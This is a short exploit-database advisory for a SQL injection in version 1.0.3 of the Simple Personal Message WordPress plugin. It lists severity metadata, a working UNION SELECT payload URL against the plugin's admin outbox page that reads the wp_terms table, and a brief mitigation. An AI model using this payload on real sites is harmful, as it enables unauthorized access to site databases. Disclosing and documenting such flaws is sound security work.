vendor:
Simple Personal Message
by:
Lenon Leite
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Simple Personal Message
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:simple_personal_message:1.0.3
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 8
2016
Single Personal Message 1.0.3 – Plugin WordPress – Sql Injection
$_GET['message'] is not escaped, allowing for every registered user to access the URL http://target/wp-admin/admin.php?page=simple-personal-message-outbox&action=view&message=0%20UNION%20SELECT%201,2.3,name,5,slug,7,8,9,10,11,12%20FROM%20wp_terms%20WHERE%20term_id=1
Mitigation:
Ensure that user input is properly sanitized and escaped before being used in a SQL query.